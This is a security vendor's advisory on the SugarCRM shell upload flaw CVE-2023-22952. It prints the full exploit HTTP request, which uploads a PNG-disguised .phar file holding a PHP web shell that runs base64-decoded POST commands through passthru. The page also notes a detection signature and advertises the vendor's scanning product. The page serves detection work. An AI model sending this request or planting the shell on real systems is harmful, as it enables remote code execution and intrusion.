top of page

SugarCRM Shell File Upload (CVE-2023-22952)


Application Details

SugarCRM is an open source customer relationship management suite.


Vulnerability

SugarCRM versions up to 12.2.0 suffer from a remote shell upload vulnerability. SugarCRM could allow a remote authenticated attacker to execute arbitrary code on the system, caused by improper input validation.


Identification

By sending a specially crafted request, using the EmailTemplates, an attacker could exploit this vulnerability to execute arbitrary PHP code on the system.


POST /index.php HTTP/1.1
Host: 192.168.74.130:8080
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 577
Content-Type: multipart/form-data; boundary=24dca17724a5bf7732b724ccdaa83abd


--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="module"


EmailTemplates
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="action"


AttachFiles
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="file"; filename="sweet.phar"
Content-Type: image/png


.PNG
.
...
IHDR.............O.f....KPLTE<?php echo "#####"; passthru(base64_decode($_POST["c"])); echo "#####"; ?> ..x7...	pHYs..........+.....*IDAT(.c`.
...YX..98..yx......ED..%.h..C...0..-L.Z.....IEND.B`.
--24dca17724a5bf7732b724ccdaa83abd--

Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.


Coverage

Idappcom has created signature 8023455 along with a traffic file for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

Comments


bottom of page